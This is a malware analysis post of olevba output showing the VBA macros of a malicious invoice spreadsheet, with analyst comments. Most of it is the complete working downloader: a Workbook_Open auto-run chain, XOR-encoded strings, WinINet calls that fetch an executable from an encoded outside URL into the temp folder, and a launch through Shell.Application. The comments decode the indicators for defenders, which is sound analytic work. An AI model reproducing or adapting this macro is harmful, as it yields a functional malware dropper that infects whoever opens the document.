dynamoo

Malicious Excel macro

Apr 14th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- Invoice-83230.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: Invoice-83230.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ЭтаКнига.cls
  13. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub VICTOR(MARTIN As Long)
      ' Pass-through hop in the launch chain: MARTIN is never read, the body only calls JEREMY.
  17. JEREMY
  18. End Sub
  19.  
  20. Sub Workbook_Open()
      ' Auto-exec entry point: Excel runs this handler when the workbook is opened
      ' (flagged as AutoExec in the olevba table below). The literal 544 is a decoy;
      ' VICTOR ignores its argument and simply starts the call chain.
  21. VICTOR 544
  22. End Sub
  23.  
  24.  
  25. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  26. ANALYSIS:
  27. +----------+---------------+----------------------------------------+
  28. | Type     | Keyword       | Description                            |
  29. +----------+---------------+----------------------------------------+
  30. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
  31. +----------+---------------+----------------------------------------+
  32. -------------------------------------------------------------------------------
  33. VBA MACRO Лист1.cls
  34. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  35. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  36. (empty macro)
  37. -------------------------------------------------------------------------------
  38. VBA MACRO Лист2.cls
  39. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  40. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  41. (empty macro)
  42. -------------------------------------------------------------------------------
  43. VBA MACRO Лист3.cls
  44. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  45. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  46. (empty macro)
  47. -------------------------------------------------------------------------------
  48. VBA MACRO Module1.bas
  49. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  50. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  51.  
  52. Option Explicit
  53.  
  54.  
       ' Hex-encoded strings. ALBERT (Module5) decodes them at run time by XOR-ing each
       ' byte with the text of HENRY, used as a repeating key that starts at its second
       ' character. Decoded by hand from the values below (network IoC defanged):
       '   PATRICK -> "Shell.Application"            (ProgID used to launch the file)
       '   PETER   -> "\stepk1.5a.exe"               (dropped file name)
       '   HAROLD  -> hxxp://925balibeads[.]com/94/053.exe   (download URL)
       '   DOUGLAS -> "Scripting.FileSystemObject"   (ProgID used for file checks)
  55. Public Const PATRICK = "1A242920356F1E413625252F2D2D28305F"
  56. Public Const PETER = "153F3829292A6E1F73286229343C"
  57. Public Const HAROLD = "2138383C636E7008747C2E2D2030233A50223A622F23346E66056979797F623C393A"
  58. Public Const DOUGLAS = "1A2F3E252935365F21670A25203C122642322C21032E33243C45"
  59. Public Const HENRY = "FILLLYA_1"
  60.  
  61.  
       ' JAMES is not referenced anywhere in the macro code shown in this report.
  62. Public Const JAMES = "JOHN"
  63.  
       ' WinINet imports under meaningless aliases:
       '   ROBERT  = InternetCloseHandle    MICHAEL = InternetOpenA
       '   WILLIAM = InternetReadFile       DAVID   = InternetOpenUrlA
       ' The first branch declares them PtrSafe with LongPtr handles for 64-bit VBA7;
       ' the #Else branch is the same set with Long handles. The line continuations
       ' split "Public Declare PtrSafe Function" across lines, which hides the
       ' keywords from naive single-line pattern matching.
  64. #If VBA7 And Win64 Then
  65. Public _
  66. Declare _
  67. PtrSafe _
  68. Function _
  69. ROBERT Lib _
  70. "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
  71. Public _
  72. Declare _
  73. PtrSafe _
  74. Function _
  75. MICHAEL Lib _
  76. "wininet.dll" Alias "InternetOpenA" (ByVal CHARLES As String, ByVal JOSEPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As LongPtr
  77. Public _
  78. Declare _
  79. PtrSafe _
  80. Function _
  81. WILLIAM Lib _
  82. "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  83. Public _
  84. Declare _
  85. PtrSafe _
  86. Function _
  87. DAVID Lib _
  88. "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
  89. #Else
  90. Public Declare Function ROBERT Lib "wininet.dll" _
  91. Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
  92. Public Declare Function MICHAEL Lib "wininet.dll" _
  93. Alias "InternetOpenA" (ByVal CHARLES As String, ByVal JOSEPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As Long
  94. Public Declare Function WILLIAM Lib "wininet.dll" _
  95. Alias "InternetReadFile" (ByVal PAUL As Long, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  96. Public Declare Function DAVID Lib "wininet.dll" _
  97. Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
  98. #End If
  99.  
  100.  
  101.  
        ' Parameters for the WinINet calls in TIMOTHY and ANDREW:
        '   KEVIN   - size of the fixed-length read buffer and of each InternetReadFile request
        '   JASON   - first argument of InternetOpenA, i.e. the HTTP User-Agent ("Perro");
        '             an unusual agent string that proxy/IDS rules can match on
        '   MATTHEW - access-type argument of InternetOpenA (1 = INTERNET_OPEN_TYPE_DIRECT)
        '   GARY    - flags argument of InternetOpenUrlA (&H4000000 matches
        '             INTERNET_FLAG_NO_CACHE_WRITE, so the download is not cached)
  102. Private Const KEVIN = 8162
  103. Private Const JASON As String = "Perro"
  104. Private Const MATTHEW = 1
  105. Private Const GARY = &H4000000
  106.  
  107. Public Function TIMOTHY _
  108. (ByVal JOSE As String) As Boolean
        ' Downloader: opens a WinINet session, fetches the URL that ANDREW decodes,
        ' and writes the response body to the file path JOSE.
        ' Returns True when the collected data has non-zero length; returns False
        ' (the default) when the session or the URL handle could not be opened.
  109.     #If VBA7 _
  110.     And Win64 Then
  111.         Dim LARRY As LongPtr, JEFFREY As LongPtr
  112.     #Else
  113.         Dim LARRY As Long, JEFFREY As Long
  114.     #End If
  115.     Dim FRANK As Long
  116.     Dim MARK As String * KEVIN, CHARLES As String
  117.     Dim SCOTT As Integer, ERIC As Double
        ' LARRY = WinINet session handle (InternetOpenA with user agent JASON).
  118.     LARRY = MICHAEL(JASON, MATTHEW, vbNullString, vbNullString, 0)
  119.     If LARRY = 0 Then
  120.         Exit Function
  121.     End If
        ' STEPHEN is declared but never used.
  122.     Dim STEPHEN As Boolean
  123.    
        ' ANDREW fills JEFFREY (ByRef) with the InternetOpenUrlA handle; its Boolean
        ' result is always True, so the empty If is padding and the real success
        ' check is the JEFFREY = 0 test below.
  124.     If ANDREW(JEFFREY, LARRY) Then
  125.     End If
  126.     If JEFFREY = 0 Then
  127.         ERIC = 0
  128.     Else
        ' First read. FRANK receives the byte count, but the next line copies the
        ' whole fixed-length buffer (KEVIN characters) regardless of FRANK, so the
        ' written file begins with a full buffer even if fewer bytes arrived.
  129.         WILLIAM JEFFREY, MARK, KEVIN, FRANK
  130.         CHARLES = MARK
        ' Junk loop: RAYMOND only takes 321 and 322, so the End never executes.
        ' Dead code of this shape recurs through the macro as analysis noise.
  131.           Dim RAYMOND As Long
  132. For RAYMOND = 321 To 322
  133. If RAYMOND = 1232 Then End
  134. Next RAYMOND
        ' Remaining reads: append FRANK bytes per call until InternetReadFile
        ' reports zero bytes read.
  135.         Do While FRANK <> 0
  136.             WILLIAM JEFFREY, MARK, KEVIN, FRANK
  137.                     CHARLES = CHARLES + Mid(MARK, 1, FRANK)
  138.         Loop
        ' ERIC = length of the collected data; SCOTT = a free file number
        ' (JOSHUA ignores its "JERRY" argument and returns FreeFile).
  139.              ERIC = GREGORY(CHARLES): _
  140.              SCOTT = JOSHUA("JERRY")
        ' Binary write of the whole buffer to the target path JOSE.
  141.         Open JOSE _
  142.             For Binary Access Write _
  143.         Lock Write _
  144.         As #SCOTT
  145.         Put #SCOTT, _
  146.                 , CHARLES
        ' Another junk loop: DENNIS never equals 437.
  147.         Dim DENNIS As Double
  148.             For DENNIS = 42 To 43
  149.     If DENNIS = 437 Then End
  150. Next DENNIS
  151.         Close #SCOTT
  152.     End If
        ' Handle cleanup via InternetCloseHandle. NOTE(review): ROBERT is declared
        ' with a ByRef parameter, so the API likely receives the variable's address
        ' rather than the handle value - confirm before relying on the close.
  153.     ROBERT JEFFREY
  154.     ROBERT LARRY
  155.     CHARLES = ""
  156.     If ERIC Then
  157.         TIMOTHY = True
  158.     End If
  159. End Function
  160.  
  161. Public Function VASILY(ByRef HARRY As Integer, ByRef FRED As Integer) As String
        ' Core of the string decoder: XORs the two values and returns the resulting
        ' character. ALBERT calls it with a cipher byte (HARRY) and a key byte (FRED).
  162.     VASILY = Chr(HARRY Xor FRED)
  163. End Function
  164.  
  165. Public Function SEREGA(ByRef ADAM As String, ByRef BILLY As Long) As Integer
        ' Returns the numeric value of the BILLY-th two-digit hex pair in ADAM:
        ' KOLYAN gives the 1-based start offset, PETRO slices two characters, and
        ' Val("&H" & ...) parses them as hexadecimal.
  166.  SEREGA = Val("&H" & (PETRO(ADAM, KOLYAN(BILLY), 2)))
  167. End Function
  168. Public Function KOLYAN(ByRef BILLY As Long) As Long
        ' Maps a 1-based byte index to the 1-based character offset of its hex pair
        ' (1 -> 1, 2 -> 3, 3 -> 5, ...).
  169.  KOLYAN = (2 * BILLY) - 1
  170. End Function
  171. Public Function DENISKA(ByRef BRANDON As String, ByRef BILLY As Long) As Integer
        ' Returns the character code of the key byte for position BILLY. The index is
        ' (BILLY Mod Len(BRANDON)) + 1, so the key repeats and the first byte decoded
        ' (BILLY = 1) uses the key's second character, not its first.
  172. DENISKA = Asc(PETRO(BRANDON, _
  173.         ((BILLY Mod GREGORY(BRANDON)) + 1), 1))
  174. End Function
  175.  
  176. Public Function PETRO(ByRef WALTER As String, ByRef HARRY As Integer, ByRef FRED As Integer) As String
        ' Thin wrapper around Mid$: FRED characters of WALTER starting at position HARRY.
        ' Wrapping the built-in keeps "Mid" out of the decoder's call sites.
  177.     PETRO = Mid$(WALTER, HARRY, FRED)
  178. End Function
  179.  
  180. Public Function GREGORY(WALTER As String) As Long
        ' Thin wrapper around Len: returns the length of WALTER.
  181. GREGORY = Len(WALTER)
  182. End Function
  183. Public Function JOSHUA(WALTER As String) As Integer
        ' Returns the next free file number (FreeFile). WALTER is ignored; the
        ' parameter exists only to make the call look like something else.
  184.     JOSHUA = FreeFile
  185. End Function
  186.  
  187.  
  188. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  189. ANALYSIS:
  190. +------------+----------------+-----------------------------------------+
  191. | Type       | Keyword        | Description                             |
  192. +------------+----------------+-----------------------------------------+
  193. | Suspicious | Lib            | May run code from a DLL                 |
  194. | Suspicious | Open           | May open a file                         |
  195. | Suspicious | Write          | May write to a file (if combined with   |
  196. |            |                | Open)                                   |
  197. | Suspicious | Put            | May write to a file (if combined with   |
  198. |            |                | Open)                                   |
  199. | Suspicious | Chr            | May attempt to obfuscate specific       |
  200. |            |                | strings                                 |
  201. | Suspicious | Xor            | May attempt to obfuscate specific       |
  202. |            |                | strings                                 |
  203. | Suspicious | Binary         | May read or write a binary file (if     |
  204. |            |                | combined with Open)                     |
  205. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  206. |            |                | be used to obfuscate strings (option    |
  207. |            |                | --decode to see all)                    |
  208. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  209. |            |                | may be used to obfuscate strings        |
  210. |            |                | (option --decode to see all)            |
  211. | IOC        | wininet.dll    | Executable file name                    |
  212. +------------+----------------+-----------------------------------------+
  213. -------------------------------------------------------------------------------
  214. VBA MACRO Module2.bas
  215. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  216. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  217.  
  218. Public Function ARTHUR(ByRef RYAN As Object, ByVal ROGER As String) As Boolean
        ' Returns RYAN.FileExists(ROGER) as a Boolean. The only caller on this page
        ' (JONATHAN) passes the object created by KEITH as RYAN.
  219. If RYAN.FileExists(ROGER) Then
  220. ARTHUR = True
  221. Else
  222. ARTHUR = False
  223. End If
  224. End Function
  225. #If VBA7 _
  226.     And Win64 Then
  227.        Public Function ANDREW(ByRef JOE As LongPtr, JUAN As LongPtr) As Boolean
  228.     #Else
  229.        Public Function ANDREW(ByRef JOE As Long, JUAN As Long) As Boolean
  230.     #End If
        ' Opens the download URL on the WinINet session JUAN and hands the resulting
        ' handle back through JOE (ByRef). Always returns True, so callers must test
        ' JOE for 0 to detect failure. HOWARD is declared but never used.
  231. Dim JACK As String
  232. Dim HOWARD As Long
        ' JACK = HAROLD XOR-decoded with key HENRY; worked out by hand this is
        ' hxxp://925balibeads[.]com/94/053.exe (defanged). The 325 is ignored by EUGENE.
  233.     JACK _
  234.     = EUGENE(325, HENRY, HAROLD)
  235.    
        ' DAVID is InternetOpenUrlA: (session, URL, no extra headers, header length 0,
        ' flags GARY, context 0).
  236.                 JOE _
  237.     = DAVID _
  238.     ( _
  239.     JUAN, _
  240.     JACK, vbNullString, _
  241.     0, _
  242.     GARY, 0)
  243.     ANDREW = True
  244. End Function
  245.  
  246.  
  247.  
  248. Public Function EUGENE(BOBBY As Long, CARLOS As String, RUSSELL As String) As String
        ' Indirection around the decoder: forwards key CARLOS and hex string RUSSELL
        ' to ALBERT and returns the result. BOBBY is never read; callers pass
        ' arbitrary numbers (325, 2332) as noise.
  249. EUGENE = ALBERT(CARLOS, RUSSELL)
  250.    
  251. End Function
  252.  
  253.  
  254.  
  255.  
  256. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  257. ANALYSIS:
  258. No suspicious keyword or IOC found.
  259. -------------------------------------------------------------------------------
  260. VBA MACRO Module3.bas
  261. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
  262. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  263.  
  264.  
  265.  
  266.  
  267. Public Function JONATHAN()
        ' Main payload routine, reached from Workbook_Open through
        ' VICTOR -> JEREMY -> ROY -> BENJAMIN. It builds a path in the temp folder,
        ' removes any earlier copy, downloads the file there and launches it.
        ' Triage indicators: a file named stepk1.5a.exe in the user's temp folder,
        ' and Excel writing and then starting an executable.
  268.  
        ' JUSTIN = object created by KEITH (ProgID decodes to Scripting.FileSystemObject);
        ' TERRY  = JUSTIN.GetSpecialFolder(2), obtained through GERALD.
  269. Dim JUSTIN  As Object
  270. Set JUSTIN = KEITH
  271. Dim TERRY As Object
  272. Set TERRY = GERALD(JUSTIN)
  273.  
        ' WILLIE = PETER decoded with key HENRY ("\stepk1.5a.exe" when worked by hand);
        ' SAMUEL = folder path & file name, the drop location.
  274. Dim SAMUEL
  275. Dim WILLIE
  276. WILLIE = EUGENE(2332, HENRY, PETER)
  277. SAMUEL = TERRY & WILLIE
  278.  
  279.  
        ' Delete a previous copy so the binary write in TIMOTHY starts from a clean file.
  280. If ARTHUR(JUSTIN, SAMUEL) Then
  281. JUSTIN. _
  282. DeleteFile SAMUEL
  283. End If
        ' Download to SAMUEL. Both If blocks below are empty: the results of TIMOTHY
        ' and of the second existence check are discarded, so execution is attempted
        ' even if the download failed.
  284. If TIMOTHY(SAMUEL) Then
  285. End If
  286. If ARTHUR(JUSTIN, SAMUEL) Then
  287. End If
        ' RALPH = CreateObject of PATRICK decoded with HENRY ("Shell.Application" when
        ' worked by hand); its Open method is then called on the dropped file.
  288. Dim RALPH
  289. Set RALPH = CreateObject _
  290. (ALBERT _
  291. (HENRY, PATRICK))
  292. RALPH.Open SAMUEL
  293. End Function
  294.  
  295.  
  296.  
  297.  
  298. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  299. ANALYSIS:
  300. +------------+--------------+--------------------------+
  301. | Type       | Keyword      | Description              |
  302. +------------+--------------+--------------------------+
  303. | Suspicious | CreateObject | May create an OLE object |
  304. | Suspicious | Open         | May open a file          |
  305. +------------+--------------+--------------------------+
  306. -------------------------------------------------------------------------------
  307. VBA MACRO Module4.bas
  308. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module4'
  309. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  310.  
  311. Public Function KEITH() As Object
        ' Creates and returns a COM object whose ProgID is DOUGLAS XOR-decoded with
        ' key HENRY; worked out by hand that string is "Scripting.FileSystemObject".
        ' The ProgID never appears in clear text, so olevba only flags CreateObject.
  312. Dim LAWRENCE As String
  313. LAWRENCE = ALBERT(HENRY, DOUGLAS)
  314. Set KEITH = CreateObject(LAWRENCE)
  315. End Function
  316. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  317. ANALYSIS:
  318. +------------+--------------+--------------------------+
  319. | Type       | Keyword      | Description              |
  320. +------------+--------------+--------------------------+
  321. | Suspicious | CreateObject | May create an OLE object |
  322. +------------+--------------+--------------------------+
  323. -------------------------------------------------------------------------------
  324. VBA MACRO Module5.bas
  325. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module5'
  326. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  327. Public Function GERALD(ByRef NICHOLAS As Object) As Object
        ' Returns NICHOLAS.GetSpecialFolder(2). With a FileSystemObject, constant 2 is
        ' TemporaryFolder, i.e. the user's temp directory.
  328. Set GERALD = NICHOLAS.GetSpecialFolder(2)
  329. End Function
  330. Sub ROY(CALEIGH As Long)
        ' Pass-through hop: CALEIGH is never read; the body only calls BENJAMIN
        ' with a throwaway string.
  331.  
  332. BENJAMIN ("BRUCE")
  333. End Sub
  334.  
  335.  
  336. Public Function BENJAMIN(JONATHANs As String)
        ' Pass-through hop: ignores its argument and calls JONATHAN, the routine that
        ' downloads and launches the payload.
  337. JONATHAN
  338. End Function
  339.  
  340.  
  341. Public Function ALBERT(BRANDON As String, ADAM As String) As String
        ' String decoder used for every hidden value in the macro.
        '   BRANDON - key text (callers pass HENRY)
        '   ADAM    - hex string, two digits per encoded byte
        ' For each byte index it XORs the hex pair's value with one key character
        ' and appends the resulting character; the concatenation is returned.
        ' Decoding the Module1 constants the same way offline recovers the IoCs
        ' without running the document.
  342.    
  343.     Dim HARRY As Integer
  344.     Dim FRED As Integer
  345.    
  346.    
        ' Junk loop: WAYNE only takes 42 and 43, so the End never executes.
  347.     Dim WAYNE As Double
  348. For WAYNE = 42 To 43
  349. If WAYNE = 32 Then End
  350. Next WAYNE
  351.    
  352.     Dim BILLY As Long
  353.     Dim STEVE As String
        ' Loop bound is Len(ADAM) / 2, the number of encoded bytes (GREGORY is Len).
  354.     For BILLY = 1 _
  355.     To _
  356.     ( _
  357.     GREGORY _
  358.     (ADAM) _
  359.     / 2)
        ' HARRY = cipher byte (hex pair BILLY), FRED = key byte for that position,
        ' VASILY = Chr(HARRY Xor FRED).
  360.         HARRY = SEREGA(ADAM, BILLY)
  361.         FRED = DENISKA(BRANDON, BILLY)
  362.         STEVE = STEVE + VASILY(HARRY, FRED)
  363.     Next BILLY
  364.    ALBERT = STEVE
  365. End Function
  366.  
  367.  
  368. Sub JEREMY()
        ' Hop in the launch chain between VICTOR and ROY. AARON is declared but never
        ' used, and the loop is junk: RANDY only takes 414 to 416, so the End never
        ' executes. The one effective statement is the call to ROY.
  369.         Dim AARON As Long
  370.  
  371.     Dim RANDY As Integer
  372. For RANDY = 414 To 416
  373. If RANDY = 1312 Then End
  374. Next RANDY
  375.  
  376. ROY (5)
  377.  
  378. End Sub
  379.  
  380.  
  381.  
  382. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  383. ANALYSIS:
  384. No suspicious keyword or IOC found.